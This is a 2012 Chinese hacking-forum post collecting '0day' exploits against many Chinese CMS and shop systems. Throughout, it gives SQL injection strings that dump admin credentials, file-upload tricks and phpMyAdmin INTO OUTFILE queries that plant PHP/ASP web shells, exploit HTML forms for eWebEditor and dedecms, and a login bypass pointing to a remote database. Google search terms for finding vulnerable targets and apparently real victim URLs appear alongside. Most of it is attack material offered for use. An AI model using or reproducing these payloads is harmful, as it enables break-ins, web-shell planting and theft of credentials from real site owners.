找回密码
 立即注册
查看: 4025|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
# q% ^6 C1 T* a
, o+ V" S% C5 k7 ^; k% p" S& q直接上exploit:
: z6 n% J6 o# D3 Z9 N  q% @6 cjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
& t1 e- X8 d- U! C1 @# ^test:http://www.tb11.net/system/xitong/shownews.asp?id=210
' L) F; K) O. W: \8 i" j; f0 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 _  k3 j2 |$ {! Q9 ^8 AAsprain论坛 注册用户 上传图片就可拿到webshell
6 I* M: c! q' u' o3 x. e: C  S$ a2 `: `2 M& H7 u5 _
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。2 f2 E/ y2 e; s8 `8 V; s6 X) q
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
+ g1 [% Y2 ^  b* Q. z- c4 M2.gif 为一小图片文件,一定要小,比如qq表情图片
7 i; B4 q. F/ |7 A3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用& r2 u5 |: U9 Q
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
0 P/ X- R/ Z  ]  j  A7 _5.q.asp;.gif! ]0 Z; f7 N* @1 D; @5 G3 [% b+ j4 s
google:Powered by Asprain, @, s: Z0 Q8 J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 f, U$ f/ q) P

0 \3 Q  V5 z7 A7 w* _1 @; HShopNum1全部系统存在上传漏洞。; k1 K% \# ^' X- N

' c3 \4 o* b: P: M首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
, V8 ~, \1 D' P6 J, M0 l5 Z2 M$ i按说明 提示登录后台。。( {- l) f" o9 k6 G# D7 l
在后台功能页面->附件管理->附件列表$ N! @# ?4 f9 x, S/ {
可以直接上传.aspx 后缀木马
! C- E' D3 g9 [% u9 [http://demo.shopnum1.com/upload/20110720083822500.aspx+ G1 U$ a$ L, M( E; A2 p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! K) t% l- m9 D; X1 D, O: f% m& g
牛牛CMS中小企业网站管理系统 上传漏洞
/ B& b: i1 V' j6 t+ v" E& e+ g* \( c. e
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。9 @+ Q" p" E2 n, [6 W6 t5 F
后台:admin/login.asp0 M8 z: W6 C# ]) m! Z; E6 z3 K; r
ewebeditor 5.5 Nday( o7 S" G6 x. l) F& T% K# ~
exp:
; U9 b% {/ _1 @3 f& }<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
; Y4 F9 P8 u! m8 ]7 t5 n: V<input?type=file?name=uploadfile?size=100><br><br>?# Y6 N; w9 ^& @3 h: \# n
<input?type=submit?value=upload>?- Q- Z2 r' K3 j+ D' t% J& p8 {
</form>
7 m4 r: Q+ I1 rps:先上传小马." m! z+ c' w3 Y! r9 s* U+ {; h; O( W( U
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏" C" w8 u' Q+ [9 V# l

* l5 r4 U' M5 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; l' J8 j/ y7 @% m# r# k6 R1 ?7 u8 a4 E6 X
YothCMS 遍历目录漏洞
; P3 p: }! l- V8 h: A: f% g0 \1 N3 r6 H6 A
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
9 f8 z4 c: a0 B3 z. a默认后台:admin/login.asp
# d- N; N# U, l3 \遍历目录:: \$ }: r) a# H
ewebeditor/manage/upload.asp?id=1&dir=../
8 h- A: E1 d5 `# b( k0 w" ?1 H8 g  |data:
" R" z7 y' d8 y& ?http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
; A# i* G2 Y( l3 K& C9 r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; ^5 m, \  G) E. G: q5 {+ L8 n! f* a. y. v% P7 F/ S8 J, c" G
Net112企业建站系统 1.0# V7 l2 i" D! W+ L, B4 p( l
: k0 |) g1 C. Y7 `; A% a
源码简介:
; q2 k$ U7 V7 b7 [9 ]Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
0 Q2 e9 R* i$ P1 }1 k8 U添加管理员:
6 E5 J2 H6 ?: J' T! R- x. [http://www.0855.tv/admin/admin.asp?action=add&level=2
$ \  Z. X" q& j$ M' U/ o9 y其实加不加都不是很重要,后台文件都没怎么作验证。) _3 e7 r! M/ j2 k
上传路径:
$ K: P. |- l  ~/ ?http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200& a2 Q( u: G% G1 Y3 D, l& ^
http://www.0855.tv/inc/Upfile.asp?Stype=2
7 g9 T6 C% O/ x; C8 O: _+ S怎么利用自己研究。
3 E, \; d, `+ O1 I- k! H. L遍历目录:
3 [0 P' ^- ]8 b  Ahttp://www.0855.tv/admin/upfile.asp?path=../..- P; a" ~0 y5 l
如:, b2 R- u# @2 l; w" I3 ?3 g2 F7 R; s
http://www.0855.tv/admin/upfile.asp?path=../admin
5 [2 N! v; u5 M! c' V0 k3 M7 Chttp://www.0855.tv/admin/upfile.asp?path=../data
2 W: K4 G, |; r4 {8 |& @: D2 n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( V) W& N( \# G0 w4 `6 X+ h+ S) P, |" u6 ?% Z
易和阳光购物商城通杀 上传漏洞
3 P' S: y4 S7 M! y/ k2 ~" R1 C4 M4 o9 p: m9 t$ {3 E
前提要求是IIS6.0+asp坏境。9 W) @' A5 M) N6 N9 X
漏洞文件Iheeo_upfile.asp
$ p- n1 M8 |  b+ ^过滤不严.直接可以iis6.0上传
+ n& [7 K0 H. H2 @8 b6 `" x( g  a& ~! T把ASP木马改成0855.asp;1.gif
: f$ H/ N- F! E- X9 F  v直接放到明小子上传
# F/ d$ I+ N1 I) U- jGoogle搜索:inurl:product.asp?Iheeoid=' G' q9 ]$ C0 C7 u# k/ Y0 N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Y( T/ H3 C5 p* O( u3 p
/ I) X9 |2 \) ^phpmyadmin后台4种拿shell方法& K( a( w/ [) m  `% R

# @! v' s3 D3 l- I: ?6 t方法一:
+ t. ]* P2 V0 ~* B3 d6 tCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );' Z( Y. z+ e( ]1 Z: K
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
' A; a: t+ j: \% E/ M8 p8 U; ?SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
, v! O8 Q+ f" N" W  ]! x0 f----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php( T- f* n+ y( d' ]2 t
一句话连接密码:xiaoma
2 Q1 F0 h1 R. u% L3 q方法二:
3 [! ?* [6 p4 ?3 P6 u5 D2 JCreate TABLE xiaoma (xiaoma1 text NOT NULL);
, p8 i& n; R3 U+ V% q8 \, j+ FInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
8 M- }' J% H/ f0 G, y& [select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';2 ]: }! V" Y( k, Q% e9 j
Drop TABLE IF EXISTS xiaoma;. d: H9 n5 u2 U) [7 p% n; b$ M
方法三:6 H1 w& }, D+ z/ Q* r
读取文件内容:    select load_file('E:/xamp/www/s.php');5 f" r4 o. O' L# x7 K3 I
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'% b& }$ g$ h0 [" Y" Z  b% P
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 g: e/ S# e6 Q& C" y方法四:
; T' a) |5 F; dselect load_file('E:/xamp/www/xiaoma.php');# }( n$ L3 g' \. o8 t" M! e) @
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'  @. k) F/ q* t, h1 @0 n2 a+ w: v
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- f* {; ?, H  _/ i( ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------  b1 e! @% G1 ~6 I! Z
5 i' \5 {8 d! N" i
传信网络独立开发网站源码0day漏洞/ D6 d( k0 z) y4 i2 [8 {% E
# S8 {! R/ t- @+ f& N6 q
后台system/login.asp$ o5 ]' k0 T( A& T
进了后台有个ewebeditor
$ s/ b( S4 k) F6 l/ {) NGoogle 搜索inurl:product1.asp?tyc=
8 i9 ]: l3 i7 r编辑器漏洞默认后台ubbcode/admin_login.asp
% U$ E" [7 _1 z- \3 i7 q1 ?; o数据库ubbcode/db/ewebeditor.mdb
8 x0 W& t/ c1 l1 p/ b默认账号密码yzm 1111114 F1 i* H! g# V  ]* X9 f
" _4 w; x- |* Y; P
拿webshell方法
3 s% P8 l" R; g$ v: D3 I  G登陆后台点击“样式管理”-选择新增样式 " ]  r3 D5 {7 {# G6 o
样式名称:scriptkiddies 随便写
2 G6 V% y, m' R# }) S1 G! u. `6 |路径模式:选择绝对路径 ( }4 `8 T, N% ]: T2 q
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
1 k5 ?. w' y1 n* q* J( D$ g图片类型比如就是我们要上传的ASP木马格式
, A" M$ ~  }5 S上传路径:/
6 c/ l2 U' E5 ^  L% F图片限制:写上1000 免的上不了我们的asp木马# m- o" z1 F/ h/ W' V
上传内容不要写- ]- ?1 P1 N. M& I4 f; n
可以提交了 . C7 X$ `; |2 f" W4 ^7 ]7 L* `
样式增加成功! 1 O, \" _: N5 o( @. b
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 * |0 w7 G$ l9 O) u8 s. ~( _
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置8 K- U' L, w0 ~4 }  Q
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
0 M6 K5 g6 w+ @上ASP木马 回车 等到路径. M. F, p: G5 U& K1 D

* ^, e3 ~0 M  ?( @5 d6 K后台:system/login.asp
+ D8 }: i" i3 H3 E1 s. c$ BExp:' a4 K5 V6 k% x
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master  i8 }( O* ^5 y. ~' J* k3 y: B
测试:
0 _  E5 D7 r' ihttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master" H: G! ]" W1 ^$ C* N2 `1 B2 Y% B
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master0 ~: ]* P: V/ h0 M& T& c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ I$ N0 s( [" r/ M& r: H/ v

6 z+ A+ x" ^% M# T! d5 a# dfoosun 0day 最新注入漏洞- P; i- Q0 D. ]( Q
! Q% C* m/ x; H* S  a) L
漏洞文件:www.xxx.com/user/SetNextOptions.asp
1 L+ @7 I; ~0 [, `# V+ i- e; Y利用简单的方法:
& Z* c5 P6 T- y* t& E暴管理员帐号:- G! b) Y2 i% n* i- w" N
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin$ s# j! d3 U( d" A" P; y
暴管理员密码:
* H) Z; ]0 [0 W  e, i7 Khttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
& n0 y: y; @, {! t" _4 E& G. ^/ N. p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' J$ R2 L' Y2 z! i) C8 `( r! S/ @$ g
0 g5 {1 W2 e3 s) M- b: f5 D网站程序的版权未知!
/ a$ F* J6 m+ `5 Q" P% O" W8 _# V) [# U9 L3 h
默认网站数据库:# R- |) O' y. T5 ^7 N) s& N
www.i0day.com/data/nxnews.mdb6 D& l  m9 n* R" x
ewebeditor 在线编辑器:8 {7 K3 X9 f/ J
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
/ P6 T  q: q- F登录地址:ewebeditor/admin_login.asp
5 D; y( o1 g* k默认密码:admin  admin. W# M7 z3 P  F9 o
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data. p! n7 N% f& I( G

3 |/ ^) c+ |$ f8 o/ ^* d  q4 |Sql注入漏洞:; a. X+ V4 w2 F8 O
http://www.i0day.com/detail.asp?id=12
6 ^. @; \3 ?* L5 M' ~exp:
' g  x, U" s" s+ g; ^1 A$ @4 _' Punion select 1,admin,password,4,5,6,7,8 from admin7 y7 x- _  k# x+ C
爆出明文帐号/密码
9 {9 C& N1 h% }! h
! {/ |0 z1 n4 a5 {上传漏洞:
- |0 ~, c$ j& l# n后台+upfile.asp% o% O7 D$ S& K" u7 N
如:: C- G" Y7 o: l2 h  L3 u
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
0 h: e  Y. z1 V+ m/ X; u- T6 Cshell的地址:网址+后台+成功上传的马
1 u0 l+ {+ H( l# l9 D- V0 C# y$ jgoogle:inurl:news.asp?lanmuName=1 M. T2 v! m8 b9 m+ d/ Q( |  [% h& s1 e
------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 l  |( T0 Q. F! i1 L  z3 G. m, ?" \

+ B6 I" d5 q% L) B- s5 H7 Ndedecms最新0day利用不进后台直接拿WEBSHELL* i/ d+ f0 z0 p, Q8 Q& g, N0 p

' y- Y4 j& m' Z- {4 G" K. J2 h拿webshell的方法如下:
0 }0 j/ ^5 ^+ o5 V4 j网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.# P& Y! J& L7 k
前题条件,必须准备好自己的dede数据库,然后插入数据:
: W! x5 V/ Z( d% p1 f4 v% F) vinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
; z1 U8 I2 w0 z* M! y
. u& v7 j& F" Y9 _) q再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" ^* T6 Y) Q8 c. z<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
0 g2 @( f. |0 X9 c$ }* Z2 ?<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />2 G* r) h2 ]5 d/ y) q
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
: m, B  T4 Q0 T2 p- [<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />& d2 O# H# m, X$ N7 Y
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ j1 L9 r) D3 ~  ?<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: i) N: {$ O, \( B7 E7 {
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( G9 i9 u0 U% }& H
<input type="text" value="true" name="nocache" style="width:400">
: \3 G1 o  }, e. |- [<input type="submit" value="提交" name="QuickSearchBtn"><br />$ m8 W  J: b  |( N2 D6 `
</form>) c7 {, Q1 F2 Z8 r% B* d
<script>
# [: u7 k  t0 T' c7 f* k% Ofunction addaction()( n- ^/ x% A, s( j$ L$ q. i: x
{
& O) s  J$ q3 c" J/ f+ ]& H- b. jdocument.QuickSearch.action=document.QuickSearch.doaction.value;' k; y0 P3 Q2 I$ @- a( {
}
) `+ V) R4 O: L' q: G+ D: h</script>
( X9 ~& a' f  X-----------------------------------------------------------------------------------------------------------------------------------------------
' z# s  B4 a& U; F5 p2 ?* @6 M5 m$ Z  @
dedecms织梦暴最新严重0day漏洞: V. F% i) V- v
bug被利用步骤如下:1 b& M* n0 s' S* X" ]9 I  d0 Z
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root5 A/ F. F" V+ h
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 N( O6 k) ~. y  |9 P* O-------------------------------------------------------------------------------------------------------------------------------------------
% ^6 y7 ]8 k5 s1 E' F( z  C  W; I4 z! [( B6 f0 m, ]6 z
多多淘宝客程序上传漏洞 ) P2 k; J* j( t% R) X, N
漏洞页面:
  u8 S4 W- n" g$ {admin\upload_pic.php4 P9 y( d% g6 q  r& X# t
传送门:! u+ J) i5 f+ i$ L4 ~# R
http://www.www.com/admin/upload_pic.php?uploadtext=slide14 D6 W+ y* y( m, w
PS:copy张图片马 直接  xxx.php 上传抓包地址!+ B3 E+ A& \" S  j+ x- h( O
------------------------------------------------------------------------------------------------------------------------------------------------------
; ~1 d* R- Y9 S0 B! |! N: v$ O" [: T( y
无忧公司系统ASP专业版后台上传漏洞" ]! y9 M# G% i! f
漏洞文件 后台上传
- q6 g: @' M$ y2 Z- ?3 aadmin/uploadPic.asp
8 Z' G+ m9 V4 C2 }0 Q漏洞利用 这个漏洞好像是雷池的: {& c; ~0 j6 `  S% B
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
, C9 S( C1 `& c  F4 N0 O等到的webshell路径:
$ ^' X0 K1 \) L$ G. h$ j4 B/UploadFiles/scriptkiddies.asp;_2.gif* d1 G/ K5 S/ g3 B! o& K
---------------------------------------------------------------------------------------------------------------------------------------------------- P- t: s) P- }4 E' r9 p/ n

) h6 S6 M2 S9 |' A2 H. i+ `住哪酒店分销联盟系统2010
' b+ s4 ]6 ?! r4 g+ S5 QSearch:
$ r/ j* H6 C; y' {inurl:index.php?m=hotelinfo" C" k' X4 l& p( e& K+ [& i
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin9 D8 G6 t, `: @3 G/ F5 @
默认后台:index.php?m=admin/login; [- `. _! m4 I& \6 e' d5 x
--------------------------------------------------------------------------------------------------------------------------------------------------* w( A" L4 C/ Y: m, t1 J8 i
! W& A1 M* w3 q9 j. h0 y. Z+ M
inurl:info_Print.asp?ArticleID=2 m9 N* w9 b5 k# i! O3 l8 ~* q6 D
后台 ad_login.asp
5 ^8 J7 V! U- Q9 a爆管理员密码:- Q0 p- H+ }, l# |! }6 u2 O9 t/ O; }
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
' H9 l. B! j( q. }# R" f4 m& g------------------------------------------------------------------------------------------------------------------------------------------------------------  h5 F: D' t6 z! R  j+ H3 _

; f4 q! Q0 j% O6 L+ }搜索框漏洞!+ N- D; }. G9 z  ]$ @, T
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='# g: R. ~4 r2 s7 J2 t
--------------------------------------------------------------------------------------------------------------------------------------------------------/ G  m. g. O3 u8 q) I* S

& {3 {8 }! u2 y关键字:. E* Z+ c- l+ N( E! m2 E
inurl:/reg_TemletSel.asp?step=2
2 \4 x5 y8 m+ p' E或者
! u7 {9 N7 x6 ~1 `& [8 N) e7 n电子商务自助建站--您理想的助手' k. r* r) y; E' U8 x4 d
-------------------------------------------------------------------------------------------------------------------------------------------------
; y6 L: l8 n8 m" R* w8 a, d0 g4 R% _6 w* ^- d2 h2 j
iGiveTest 2.1.0注入漏洞
) d/ _% a. j9 a. d0 c7 R# NVersion: <= 2.1.0
3 ?/ x! J- r. b' S- W# Homepage: http://iGiveTest.com/
6 v) ~' X) X( y+ R) f. W谷歌关键字: “Powered by iGiveTest”7 P. v+ g" |  h3 V7 y
随便注册一个帐号。然后暴管理员帐号和密码) c) f: t5 {" C0 I" d' z: `
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
9 m' E  `& {6 U6 _------------------------------------------------------------------------------------------------------------------------------------------------8 _3 U+ C$ F+ V6 `
! H3 ]2 H- H3 c7 t& v3 A! f
CKXP网上书店注入漏洞) q# p! o' z: {4 O; l+ Y1 v0 H
工具加表:shop_admin 加字段:admin& A& ?& y- [4 z( K+ q
后台:admin/login.asp
( [  }: s( X# v登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/% P  O# Z! m+ i/ k3 |
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
+ d7 {9 t2 d# h0 o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ w" d4 K. M$ J! `2 ]3 Q
/ H, g: D4 l. H8 e# K' v段富超个人网站系统留言本写马漏洞: z- V0 e+ V+ o, |
源码下载:http://www.mycodes.net/24/2149.htm
- F% y2 s! x% `$ W2 uaddgbook.asp 提交一句话。6 r# Z2 w7 q* b9 r
连接: http://www.xxxx.tv/date/date3f.asp2 F7 H! O  G4 J4 D* y
google:为防批量,特略!$ ^" y1 v0 |2 w
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( B: a* B$ z* f7 c  L
: b: F: h1 V! _7 ^, H智有道专业旅游系统v1.0 注入及列目录漏洞
- j* [! a# ?+ h  X2 ]. o& l6 o默认后台路径:/admin/login.asp3 w. K0 _/ P; o; X2 v% o
默认管理员:admin) e5 V" L; u" h7 D
默认密码:123456! J1 A7 C1 F1 v4 T+ h
SQL EXP Tset:
. R5 J. f0 W0 y3 L! V; D1 G/ H. Hhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
" l/ R% r" {0 _! i* i------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ Z2 a/ v) h5 ^$ h: o
! ~9 W3 o" F' _" g
ewebeditor(PHP) Ver 3.8 本任意文件上传0day* `+ a( Q5 i0 P; Q7 N+ |
EXP:* N) ~! i% c0 Z( @
<title>eWebeditoR3.8 for php任意文件上EXP</title>! W6 v! \5 H4 y2 B4 g
<form action="" method=post enctype="multip' w; J4 a$ T: O3 \! [  \: ^0 ?
art/form-data">
$ T9 O4 g6 _* a3 m' B4 v<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
5 K+ \9 v6 @& g/ SURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
+ [+ E! G9 l9 _! `0 d2 R<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
# \! p; C8 @8 A' v! [/ i4 lfile:<input type=file name="uploadfile"><br>
5 \9 B+ F( \* c% e, d<input type=button value=submit onclick=fsubmit()> ) B2 v# l8 T2 i! P- v
</form><br> . Z* R7 C- @) w
<script>
' E1 S$ }9 X3 I9 y. {function fsubmit(){ % i4 L- m3 A/ D% B) D% J
form = document.forms[0]; ! E& {. R; [( e, Z9 U
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 K( v) a* |: S) y& ualert(form.action);
" R* V, z* H& t. _9 J9 t( ~form.submit();
4 j4 m/ J- C0 A3 S( p} 7 C$ _2 R8 R* X, l& Y
</script>9 o6 ^1 u% ^2 l8 U. |" U% x
注意修改里面ewebeditor的名称还有路径。
% _+ b% @) o, d+ C. {---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ?+ P0 Y3 Q) K' T% t1 p4 C
1 z! t" T9 c; m1 V, M6 S
提交’时提示ip被记录 防注入系统的利用
0 B9 H% g" n1 E) p  o- q/ ~0 u网址:http://www.xxx.com/newslist.asp?id=122# n  y- @$ W2 Q' d+ }, }
提示“你的操作已被记录!”等信息。& @7 h+ R5 A+ u9 n" ?. \. h  f0 y
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。& q+ j, s8 V  {3 f0 S1 U
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------. j$ B7 D. X( \2 I2 I
  B$ s- g+ e, z) v
西部商务网站管理系统 批量拿shell-0day
2 B7 w" V3 k6 y/ z. o2 b; {这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 7 d; s/ d7 ]# p5 @% k
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
  x: n1 L- p* b& E- V2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合2 e# ^5 Q$ A9 \6 S8 O
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂5 X2 j4 U$ K/ w) D
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 c. U( f( Z% O; a' ]. T

/ D7 w- L' k6 g- o; ~JspRun!6.0 论坛管理后台注入漏洞
2 j4 M, K9 @3 v5 e, K+ S
6 U* \/ |, _6 s+ N# n1 [6 c8 gSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
" ]! C/ L; k+ pJspRun!6.0
* G3 [  E: n- ^; d/ p& c漏洞描述:' q( k/ {. b" Q0 `
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。$ b  Z  _. \) O
在处理后台提交的文件中ForumManageAction.java第1940行; o; g4 s' Y% B1 I, D4 x
String export = request.getParameter("export");//直接获取,没有安全过滤
7 R& I, M$ T/ j1 T# C# y1 ]if(export!=null){% d8 b6 d1 U1 i4 q" }
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
5 D0 ~! w6 C* v5 Q- _' j- kif(styles==null||styles.size()==0){
. c( Z: F% f' l( L  P2 {<*参考
3 ?. A! x- @$ h( C" U1 Tnuanfan@gmail.com: [4 j8 D$ F: G
*> SEBUG安全建议:6 c1 F7 b. I  D+ `5 P1 }  Y  m* B" X
www.jsprun.net
7 w5 x3 h8 c6 l(1)安全过滤变量export4 ~6 y, V$ q- s; @  p1 S
(2)在查询语句中使用占位符
% R$ U1 U% D7 I  R7 R------------------------------------------------------------------------------------------------------------------------------------------------------------------------------) Q4 p* m# M6 j

, Y6 t( z3 l% v# k! N% L# [乌邦图企业网站系统 cookies 注入
7 I# Y" f8 |$ z( a' Z& z- q$ v6 J1 T$ l8 J2 ~( Y
程序完整登陆后台:/admin/login.asp
* r. E/ Y5 O, M1 y0 j默认登陆帐号:admin 密码:admin888# @1 k  k3 N  {' E
语句:(前面加个空格)
5 g- T. |9 y) gand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin1 r# c: e1 Q3 Z: G+ V( _$ v
或者是16个字段:0 Q/ m) F$ ]9 z4 r. D5 |
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
0 d, N8 O9 J! t2 F1 k% a爆不出来自己猜字段。
, G* |3 K* e0 f- n9 n6 u4 |# v注入点:http://www.untnt.com/shownews.asp?=88' V1 t) S3 k# H( n; ]. L) H
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
8 _- N# q8 k: ~8 n关键字:; s: n& X" `$ [
inurl:shownews?asp.id=
4 T( W3 j2 {; K3 A-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; ~2 F0 u) w, W9 C7 m- n7 y- T3 K
& S: t* t9 Z3 h
CKXP网上书店注入漏洞  k, S. G; _) ]! B: V' n( a
/ y) k5 Q2 I/ r  a! q. I
工具加表:shop_admin 加字段:admin0 Q, M2 F2 l3 @$ w4 j# g! I
后台:admin/login.asp ) A/ N# {6 H5 e3 G
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" y9 [9 `, g. t0 cinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息5 |* u1 D6 o( M9 L
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 d- ?. C+ r+ _& n' p, [; M' @0 g5 F. g+ V  Z# K6 J) }
